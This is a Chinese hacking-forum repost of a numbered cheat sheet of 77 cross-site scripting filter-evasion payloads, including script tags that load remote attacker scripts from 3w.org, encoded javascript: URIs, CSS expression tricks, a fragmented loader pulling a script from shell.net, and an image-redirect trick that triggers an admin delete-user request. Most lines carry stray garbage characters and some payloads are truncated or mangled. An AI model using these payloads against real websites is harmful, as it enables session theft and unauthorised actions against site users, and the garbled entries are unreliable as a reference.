貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。 {% l$ D' o2 e
(1)普通的XSS JavaScript注入
) U7 ]- S/ x% t7 E5 l h8 @3 u( m<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>0 e3 o, E! p, B8 B- m2 d
(2)IMG标签XSS使用JavaScript命令4 k+ ^1 J7 o0 L4 _ F$ J
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>. p/ |8 _4 i: d/ v5 @
(3)IMG标签无分号无引号; R J, K }7 N
<IMG SRC=javascript:alert(‘XSS’)>
9 C3 |- J0 S+ ?" K1 A* c9 N- o(4)IMG标签大小写不敏感
( u8 u7 c9 m; W2 a7 p<IMG SRC=JaVaScRiPt:alert(‘XSS’)>
+ o' ~" c1 j+ m. a ^. f. E: s! f9 o(5)HTML编码(必须有分号)# h" k! c/ o0 f3 \/ _/ j
<IMG SRC=javascript:alert(“XSS”)>& l4 P5 F: v: x5 Y
(6)修正缺陷IMG标签
3 \+ p( g# y" l& J) @6 j7 n<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>7 F# K& V( b5 W' z
. l% r y" k5 h, V# |) q" K0 u
* l8 X, Y _: K- \(7)formCharCode标签(计算器)
0 q- E" X \6 g3 h+ L e$ U<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
! @. m- V, i t* |0 `(8)UTF-8的Unicode编码(计算器)
4 y7 }, N5 z/ d5 x<IMG SRC=jav..省略..S')>
0 ?) k m4 p$ q9 i(9)7位的UTF-8的Unicode编码是没有分号的(计算器)2 R1 `. |/ P8 e7 H. Y" N
<IMG SRC=jav..省略..S')>
* Q- v, m, o* H, }2 w(10)十六进制编码也是没有分号(计算器)
$ I i# y8 {: i( N' L% J1 D1 w; n% m<IMG SRC=java..省略..XSS')>) v4 N0 R1 F/ C' f2 X
(11)嵌入式标签,将Javascript分开3 i; p+ S# K: J7 c
<IMG SRC=”jav ascript:alert(‘XSS’);”>
/ S5 f2 G9 c6 n) J0 j2 }(12)嵌入式编码标签,将Javascript分开
0 W: v9 _+ F, F. @' ^# g<IMG SRC=”jav ascript:alert(‘XSS’);”>
8 q6 }3 V n3 u X9 f. C( Q% m(13)嵌入式换行符
3 e/ g3 o% ]* W- u- e<IMG SRC=”jav ascript:alert(‘XSS’);”>0 ^- W; @5 n. l: Q
(14)嵌入式回车$ ?; G, r9 ]2 d$ q6 W1 V4 `) [" i
<IMG SRC=”jav ascript:alert(‘XSS’);”>0 M2 D' N. B, A+ H- n5 p
(15)嵌入式多行注入JavaScript,这是XSS极端的例子; V9 ^4 |# ^2 |# K
<IMG SRC=”javascript:alert(‘XSS‘)”>! O' P' d/ b: X' w) D
(16)解决限制字符(要求同页面)5 [% \1 ^5 M7 {( J$ B7 h
<script>z=’document.’</script>1 k8 \ O7 X+ q5 M5 h$ ^. v
<script>z=z+’write(“‘</script>, w) ?* M% t+ g# ]% R" a H
<script>z=z+’<script’</script>3 o, n8 H( E! R9 K7 Z F+ O
<script>z=z+’ src=ht’</script>
( k8 H; e7 Y# O( _% a {<script>z=z+’tp://ww’</script>
/ K/ L9 w: [' [4 u<script>z=z+’w.shell’</script>
b [: w7 J5 [) b2 I% n2 r<script>z=z+’.net/1.’</script>
! p2 \9 t1 c* j" T: p<script>z=z+’js></sc’</script>
4 C; k7 J* V' j9 y5 q$ `<script>z=z+’ript>”)’</script>
' [9 m' [; o3 L( j c3 ?<script>eval_r(z)</script>
* I: O' V2 Z3 _4 n! K! B) V(17)空字符12-7-1 T00LS - Powered by Discuz! Board
$ K+ k& \: v5 X5 E* Qhttps://www.t00ls.net/viewthread ... table&tid=15267 2/6$ {; Z# } b4 J9 L7 a
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out0 G/ U7 J; C' j; T) F
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用% p$ T* H0 w0 l" n, d7 K7 T$ {/ z" [
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out6 s" G ]6 }- W0 z v# r
(19)Spaces和meta前的IMG标签4 D/ D6 f: a* |: F* l
<IMG SRC=” javascript:alert(‘XSS’);”>
2 p' K* E7 E+ Z0 C3 n(20)Non-alpha-non-digit XSS
* Q# p6 y$ U5 r2 V<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
3 q% x+ _0 G6 B* E. K(21)Non-alpha-non-digit XSS to 2( p* K: v8 z. W/ t8 W0 a
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>8 X; v1 p8 s: b- c
(22)Non-alpha-non-digit XSS to 3
; c& C) }3 A6 h<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>* z. i3 T8 M" N5 P0 T! i0 U& K; e
(23)双开括号! @7 C! o/ Z/ {1 Z E2 G
<<SCRIPT>alert(“XSS”);//<</SCRIPT>
c. q# g L: u/ h8 A+ N4 [(24)无结束脚本标记(仅火狐等浏览器)
5 Y5 m6 w' T- {+ w<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>4 ~, m3 a# M: Z- |5 z5 ? D/ Z
(25)无结束脚本标记2
5 K# X2 B5 y0 K* d" k<SCRIPT SRC=//3w.org/XSS/xss.js>0 V# U% Q: P3 E1 ?6 D2 X
(26)半开的HTML/JavaScript XSS0 z1 _- A/ B; h- K
<IMG SRC=”javascript:alert(‘XSS’)”
: \0 j7 ^+ _, r$ }9 N(27)双开角括号# o, V: `8 q, r4 X) u" }7 x: J
<iframe src=http://3w.org/XSS.html <- V5 k, l) G7 \
(28)无单引号 双引号 分号
) {$ S' D, Q2 n+ [0 `1 u# t<SCRIPT>a=/XSS/# n& n; f0 t. p8 a( e
alert(a.source)</SCRIPT>
9 y8 z* ]9 ]" X2 Z(29)换码过滤的JavaScript) ^" T2 z0 u1 ]* o! G
\”;alert(‘XSS’);//
1 i0 F9 W" ^5 d4 N* n( f3 M8 p& ^(30)结束Title标签
* ~7 v) ^7 k/ M- P: G& L; v</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
) P' ?$ H/ z3 K% J t( C(31)Input Image
) H5 ~( Q+ i( c& d; y! F! Y<INPUT SRC=”javascript:alert(‘XSS’);”>; X* {: \9 H% ]% o
(32)BODY Image/ U9 H1 i! o- d
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
& s. S. G! q5 n, q' t. y8 F(33)BODY标签
6 _( _: T& Y+ g: u- m& F0 i<BODY(‘XSS’)>% _6 G! L* F3 @! |
(34)IMG Dynsrc
4 \7 n& K- Z [# @3 @<IMG DYNSRC=”javascript:alert(‘XSS’)”>4 o0 Z' P& }3 i: e
(35)IMG Lowsrc
4 s- w; I. P# b+ H* W<IMG LOWSRC=”javascript:alert(‘XSS’)”>( L" L: `1 w8 d K) M
(36)BGSOUND
y3 }0 n0 H# C! P' h7 F% @2 V<BGSOUND SRC=”javascript:alert(‘XSS’);”>3 x$ l3 F, p& j* }/ T) n
(37)STYLE sheet
# T& C2 t4 [# I R' y) M B9 N<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
1 |3 v/ e% L! M5 b& P+ B$ b(38)远程样式表; i) P% L# ?* O3 x. T' a
<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>+ l Z( R$ ~+ C+ U" K
(39)List-style-image(列表式)
- j' Z+ X+ M: ?* H# v<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
- h7 R% I3 o0 K1 j ?(40)IMG VBscript
! s0 J! [5 ^. a+ p" P<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS# t3 J* t7 w1 {+ z/ j% Z d) l9 b
(41)META链接url8 |$ r+ j( N# J
7 C9 n* Y/ S+ D! ~2 g5 H/ c. A
( |$ P# X& x2 b1 G<META HTTP-EQUIV=”refresh” CONTENT=”0;
. Q! K% Q9 W2 v) b6 q) i# r* Q) NURL=http://;URL=javascript:alert(‘XSS’);”>
1 a$ u6 C. g. h2 M P8 p( N8 `(42)Iframe. m1 R% b$ Q1 y) q3 T
<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>- K, R+ i! `) g. J8 ]/ ]: V' u$ A7 V' U* H
(43)Frame
, V- }* R* U! I' w<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>12-7-1 T00LS - Powered by Discuz! Board
- E4 r. E% B0 i' ohttps://www.t00ls.net/viewthread ... table&tid=15267 3/6
' C. W+ ] q) W6 g: R6 {(44)Table
9 ]9 y [* V$ Q" K0 s" Z- o<TABLE BACKGROUND=”javascript:alert(‘XSS’)”># c! ~3 @2 j& G9 n# \6 M n& z
(45)TD
- l3 ~: B9 `& N8 Y# }$ E<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>* h! u, g N( i: S: { j. Z! s
(46)DIV background-image
/ B1 o7 h, Z+ C* u9 X: W<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>+ b9 }3 |% \4 e1 N; [% \1 o
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-
: K+ P! M+ l4 a& ?$ q) F1 @+ B8&13&12288&65279)
V K8 B8 z% j0 K, r<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>6 e! z6 W7 _2 c! X& u
(48)DIV expression3 c, C% y1 I$ o6 g
<DIV STYLE=”width: expression_r(alert(‘XSS’));”>
" e5 B! e- L+ G! Y4 K K(49)STYLE属性分拆表达: Y/ Q) t4 f( J' C
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>+ ]: Z4 m' E( v7 [
(50)匿名STYLE(组成:开角号和一个字母开头)
' l. D5 \" H9 y6 a; Q# q<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>2 Z7 @/ ^- T9 u( X
(51)STYLE background-image
; W3 S; O8 E& _. o% M<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A5 \- J- [$ y" b6 `" e
CLASS=XSS></A>
% L# y7 }* f# s- |1 L0 P2 p(52)IMG STYLE方式( h3 W- M6 O* K! Q/ ]4 I& F
exppression(alert(“XSS”))’>8 e$ [2 O9 B0 C$ A2 G
(53)STYLE background, t& l5 x5 W/ v" Z! g& U! M# B
<STYLE><STYLE
! r* f1 O' k7 H6 u6 N% wtype=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
* `' n3 L$ [; e1 J# K. u(54)BASE
+ j! \# e4 e$ p3 S<BASE HREF=”javascript:alert(‘XSS’);//”>
0 I- y4 o1 {9 m0 M* o% {. }0 b(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS. q* u& B* z! a+ i& t/ F2 A
<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>
* @' @* M( i4 T2 n. S& O9 w(56)在flash中使用ActionScrpt可以混进你XSS的代码
( Q$ o2 f# m1 X* xa=”get”;* m6 y- k; e% }, g0 ~- l K
b=”URL(\”";! a' ?" e4 Z8 ?3 x
c=”javascript:”;5 F6 a1 g- t2 K" ~ w" k
d=”alert(‘XSS’);\”)”;
- Z0 t% R2 U# Y# _1 a4 Aeval_r(a+b+c+d);! M9 C; I0 [2 T8 a+ X
(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上
4 U* w `8 G: N( ]8 n<HTML xmlns:xss>
% Y- B# v% t; e& t/ W: e<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>
) H$ M. D( j5 ~1 R) V& ^- Y4 w<xss:xss>XSS</xss:xss>
9 @$ d' m' F' g0 \- p i& r</HTML>1 H% v* g. Y {. ^2 M: V
(58)如果过滤了你的JS你可以在图片里添加JS代码来利用1 b; C# b$ j7 o2 T, Z
<SCRIPT SRC=””></SCRIPT>
' X$ m6 a/ I0 D# [; b- t(59)IMG嵌入式命令,可执行任意命令5 D& `3 Z4 E# d! Y, }
<IMG SRC=”http://www.XXX.com/a.php?a=b”>
6 u1 Q& ]1 d, i# G' ~(60)IMG嵌入式命令(a.jpg在同服务器)
6 s1 q, j* G; V: @* t1 XRedirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser1 V. i) Y7 p3 f9 y0 s
(61)绕符号过滤" F: V- Y5 B$ ~* D$ I4 C
<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT># f% [% u- G6 s1 e1 p
(62)
1 v& H& ^3 C3 ^$ \# b<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>
; F1 l7 s1 J+ [* l(63)+ s$ J6 I/ L0 m) D* |1 m
<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>
% h) x, Q8 K3 i/ A(64)
( E A9 k7 A$ C. J; I<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>% b, `6 v7 Q- y, n; U
(65)0 h4 n4 U( u4 {8 X6 T! h
<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>
# w- ?1 S/ Q6 U, t8 ~5 ~(66)12-7-1 T00LS - Powered by Discuz! Board' E7 ?& {3 c, y
https://www.t00ls.net/viewthread ... table&tid=15267 4/69 h, @% ]0 {; m, J8 Y5 A
<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT># ], o% o% p5 M# @ i5 u
(67)3 [. ?8 H+ V' a
<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”>
4 e! j% E4 F( f' T# U' G</SCRIPT>4 ^- H' R! k/ _$ j7 L$ }" y/ P
(68)URL绕行
- a* _* A% w% Y0 v<A HREF=”http://127.0.0.1/”>XSS</A>( U+ Y2 i" I, ^1 |- ]& w- g/ p
(69)URL编码4 k# j l+ v- r
<A HREF=”http://3w.org”>XSS</A>
! {2 H5 L8 `' T/ C; ~(70)IP十进制, m" B7 i& n! a' E G
<A HREF=”http://3232235521″>XSS</A>
/ ^4 \& y3 M6 t9 I) y/ }, {9 b(71)IP十六进制' `0 z0 ~/ k8 _. z: k* |2 i" Y2 A
<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>( U) z( Z) v; u- [$ Z1 t/ [& h
(72)IP八进制
. u. U& s7 y7 x/ o( I<A HREF=”http://0300.0250.0000.0001″>XSS</A>% `% I; g: Y9 p& A2 I& C
(73)混合编码
" g+ i0 u3 m7 M4 I2 E$ ~3 L<A HREF=”h
; U' p4 a9 x3 K. n$ M- Btt p://6 6.000146.0×7.147/”">XSS</A>( n& k, o2 l* B- t. M
(74)节省[http:]
9 |9 r. u6 M! j' |6 Y<A HREF=”//www.google.com/”>XSS</A>
2 g+ N; u; p- U(75)节省[www]8 a" f( u; Z# N3 r: e" T
<A HREF=”http://google.com/”>XSS</A>! V/ G7 l3 Z$ i v
(76)绝对点绝对DNS
" R/ i( X, G E<A HREF=”http://www.google.com./”>XSS</A>1 b2 Y( D, O. h
(77)javascript链接- q& D5 F( y( Z- M8 W
<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>
! z1 P7 E, ]4 P/ Y, Q7 b2 \7 ]" @# N$ ^& m8 b+ h$ }( P! n
原文地址:http://fuzzexp.org/u/0day/?p=14; F% ]6 R! i! p) t K! ~; l
9 V! T# ^2 p* ~6 l: o) N/ e" \/ R |
发表于 2013-4-19 19:22:37
收藏
支持
反对